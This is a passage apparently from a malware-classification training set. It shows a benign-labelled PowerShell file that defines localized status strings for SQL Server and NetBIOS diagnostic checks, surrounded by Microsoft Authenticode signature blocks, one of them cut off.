VSGAzvnreGhOrB2LtdKoVSe5LbYpihXctDe76iYtL+mhxXPEpzda3bJlhPTOQ3KO # EZApVERBo5yltWjPCWlXxyCpl5jj9nY0nfd071bemnou8A3rUZrdgKIautsH7SHO # iOebZGqNu+622vJta3eAYsCAaxAcB9BiJPla7Xad9qrTYdT45VlCYTtBSY4oVRse # dSADv99jv/iYIAGy1bCytua0o/Qqv9erKmzQCTVMXaDc25DTLcMGJrRua3K0xivd # tnoBexzVJr6yXqM+Ba2whIVRvGcriBkKX0FJFeW7r29XX+k0e4DnG6iBHKQjec6V # NzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQEL # BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNV # BAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4X # DTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzAR # BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p # Y3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3Rh # bXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM # 57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm # 95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzB # RMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBb # fowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCO # Mcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYw # XE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW # /aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/w # EPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPK # Z6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2 # BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfH # CBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYB # BAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8v # BO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYM # KwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEF # BQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBW # BgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUH # AQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtp # L2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsF # AAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518Jx # Nj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+ # iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2 # pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefw # C2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7 # T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFO # Ry3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhL # mm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3L # wUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5 # m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE # 0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNNMIICNQIB # ATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UE # CxMeblNoaWVsZCBUU1MgRVNOOkE0MDAtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNy # b3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCOHPtgVdz9 # EW0iPNL/BXqJoqVMf6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX # YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg # Q29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAy # MDEwMA0GCSqGSIb3DQEBCwUAAgUA6be7PjAiGA8yMDI0MDQwMzExMjU1MFoYDzIw # MjQwNDA0MTEyNTUwWjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDpt7s+AgEAMAcC # AQACAgCFMAcCAQACAhPwMAoCBQDpuQy+AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwG # CisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEL # BQADggEBAGOEGg2aN3xyURELmw+L+GX8p2GLWI15sn26L5zZ1RCMYvrrEPzbIkBT # j1NL0yFvaXLZb68bd179ylRdRB49JdGqFq0JlXlDpduzp+W9aX4OsZcimqvnX/aV # v8vpwR0bkwQiF36Wlw3TXbw2aZdv/KnRY/COKkaoKxQxC9rgkNw5MLAx+GJfJFYx # lMwxRj+jQkox5WIar2zQ+etv9rPjBrUmC2eDaY7gc8q8+3N/aVk/bE/j6LWpX5d5 # zJSjmZLTCPvHFakF75DP7NBXDK6u3RQgxwqvcQBdP3SXpw0P72aW5NEI3EAbdjiL # caVi+qcCb/mHcVEsE/IQWfbRiTzLslgxggQNMIIECQIBATCBkzB8MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg # VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAezgK6SC0JFSgAABAAAB7DANBglghkgB # ZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3 # DQEJBDEiBCAzj38l6MmSjd10YkPeOEc8ona7joCH+R/GU1EFGuEQBjCB+gYLKoZI # hvcNAQkQAi8xgeowgecwgeQwgb0EICcJ5vVqfTfIhx21QBBbKyo/xciQIXaoMWUL # ejAE1QqDMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA # AAHs4CukgtCRUoAAAQAAAewwIgQgKz3kSreOLui1ENgzHV9zHDupRYY2KLepgApY # ryRPCEkwDQYJKoZIhvcNAQELBQAEggIAe1RnxsR32uFGfU71eSEYSIhnl5XJJ4gN # PCg9BLhcGoJ6VR21sP6G9O6X0TQdCd4Q85r4ORwL8HVjK6dPs4uJkNXIe1s0AGqx # ReNVrPIKmdDpwqN73/xlFMPWeiiBvCSoUK6bW8pB45R2+Vl5Jk8S0r7XsSd3V9+h # Xmu5vF9GwzzNcxNhxxJRv0QcJklNqzGao14ff+GLRK9wjS2c8hM3yxsfTRDZGAlG # FxY68fPnaQpGWjcwsWVgpsHVUQngFxuRWd4m+P8xbfAy9Jd9M9NlcQL9lQIDUwdr # 4OJOr4HPAcsiGMDJm4aCvRpPSp5E8DBq8ApdKsBWdrLWX9KLCVJ8jzCFPW8W0oM4 # OkPn29NPq2jcRuk7sBiQGziiCyNAF3J02NdmpejORhpygxSGoZ9IQKu+0567BRcN # A0xAHAPeWPDXxALyYDvKAzKYq9dJP4d1tBSP5nP51VCohLTIhpzMhzfGcCsEUAbj # 78e69dLsnGk3kKlbqfDfM4Sw9FITLvjnVfWtf6U9+i3mJ/Cu2jz1n2q6Iosxtkt4 # flEu6goNOwRIgQTTXPHPOOdcnEM0Nyld3t/OsfxlGnSoX7PWBY4m5ke6utvMOE5R # fuJ6vJ7Mu+uqvAincoguuko7nJyG/ZQewL5p18uL2HD10ezuXwOfVuSVaZEMzzIn # LR7NZjsngAY= # SIG # End signature block
combined_dataset/train/non-malicious/sample_18_54.ps1
sample_18_54.ps1
ConvertFrom-StringData @' id_systemservicediagnostic_sqlconnect=Connect to a Sql Server Instance id_systemservicediagnostic_sqlconnectdesc=Trying to connect to Sql Server id_axsqldataengine=Running SQL Query against Sql Server: %Server% id_axsqldataenginedesc=Checking sql configuration : %DC_Name% id_axsqlrulesengine=Running SQL Query against Sql Server: %Server% id_axsqlrulesenginedesc=Checking for root cause : %RC_Name% id_getnetbiosname=Confirming NetBIOS name id_getnetbiosnamestatus=Testing NetBIOS name: %ComputerName% for connectivity id_sqlrulesengine=Running SQL Query against Sql Server: %Server% id_sqlrulesenginedesc=Checking for sql data for inconsistencies : %RC_Name% '@ # SIG # Begin signature block # MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDta5/fYBH+BwUw # NIxSXFGkUfrg7jADY4Pz+0vjuSIorqCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIH1rhX/Evf2NyjfEfQCCc1Rb # GWIwdVJfB81TfKShSTr/MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEALZDvfk/CdB9QZE2LhDHRmYFQb22IGjJAgL9uwlGs14KJ80rrYfYW2UAw # mU5+ap1dh1Q6fV70xx8zVqeOgOv3qxT40L6LpNwpIyNKAI754WmVwT/PuQX5PDKX # 9n9DSZgdSqJ5Rx4ajS85XHRNE5CQBUNibz+z2BRpPJTDjeQ5tc1XTvjFskATZRMG # 6xr2agaPplzxaeAcjLkoJzkBKf4OmWLj8UFalgYOWcKgvLCQMaG/mrhqmDd45wX5 # CUNzp47CnezMe8P4PUN5EV6D1oSpdz4wDR4xb0Q8WdY/bI/1xH3qW0Sg/jGZnZqB # JgcJ//3QORac2QtgjRd38J3Lw8+tS6GCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC # F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAXBCAkK0iKmJxXsiWUeLNrj/mDjHl7Hqxhe6SCfG/ttgIGZxp9zsnj # GBMyMDI0MTAyODExNDAzOC4wMTdaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OEQwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHtMIIHIDCCBQigAwIBAgITMwAAAfPFCkOuA8wdMQABAAAB8zANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ2 # MDJaFw0yNTAzMDUxODQ2MDJaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OEQwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQD+n6ba4SuB9iSO5WMhbngqYAb+z3IfzNpZIWS/sgfX # hlLYmGnsUtrGX3OVcg+8krJdixuNUMO7ZAOqCZsXUjOz8zcn1aUD5D2r2PhzVKjH # tivWGgGj4x5wqWe1Qov3vMz8WHsKsfadIlWjfBMnVKVomOybQ7+2jc4afzj2XJQQ # SmE9jQRoBogDwmqZakeYnIx0EmOuucPr674T6/YaTPiIYlGf+XV2u6oQHAkMG56x # YPQikitQjjNWHADfBqbBEaqppastxpRNc4id2S1xVQxcQGXjnAgeeVbbPbAoELhb # w+z3VetRwuEFJRzT6hbWEgvz9LMYPSbioHL8w+ZiWo3xuw3R7fJsqe7pqsnjwvni # P7sfE1utfi7k0NQZMpviOs//239H6eA6IOVtF8w66ipE71EYrcSNrOGlTm5uqq+s # yO1udZOeKM0xY728NcGDFqnjuFPbEEm6+etZKftU9jxLCSzqXOVOzdqA8O5Xa3E4 # 1j3s7MlTF4Q7BYrQmbpxqhTvfuIlYwI2AzeO3OivcezJwBj2FQgTiVHacvMQDgSA # 7E5vytak0+MLBm0AcW4IPer8A4gOGD9oSprmyAu1J6wFkBrf2Sjn+ieNq6Fx0tWj # 8Ipg3uQvcug37jSadF6q1rUEaoPIajZCGVk+o5wn6rt+cwdJ39REU43aWCwn0C+X # xwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFMNkFfalEVEMjA3ApoUx9qDrDQokMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQDfxByP/NH+79vc3liO4c7nXM/UKFcAm5w6 # 1FxRxPxCXRXliNjZ7sDqNP0DzUTBU9tS5DqkqRSiIV15j7q8e6elg8/cD3bv0sW4 # Go9AML4lhA5MBg3wzKdihfJ0E/HIqcHX11mwtbpTiC2sgAUh7+OZnb9TwJE7pbEB # PJQUxxuCiS5/r0s2QVipBmi/8MEW2eIi4mJ+vHI5DCaAGooT4A15/7oNj9zyzRAB # TUICNNrS19KfryEN5dh5kqOG4Qgca9w6L7CL+SuuTZi0SZ8Zq65iK2hQ8IMAOVxe # wCpD4lZL6NDsVNSwBNXOUlsxOAO3G0wNT+cBug/HD43B7E2odVfs6H2EYCZxUS1r # gReGd2uqQxgQ2wrMuTb5ykO+qd+4nhaf/9SN3getomtQn5IzhfCkraT1KnZF8TI3 # ye1Z3pner0Cn/p15H7wNwDkBAiZ+2iz9NUEeYLfMGm9vErDVBDRMjGsE/HqqY7QT # STtDvU7+zZwRPGjiYYUFXT+VgkfdHiFpKw42Xsm0MfL5aOa31FyCM17/pPTIKTRi # KsDF370SwIwZAjVziD/9QhEFBu9pojFULOZvzuL5iSEJIcqopVAwdbNdroZi2HN8 # nfDjzJa8CMTkQeSfQsQpKr83OhBmE3MF2sz8gqe3loc05DW8JNvZ328Jps3LJCAL # t0rQPJYnOzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # 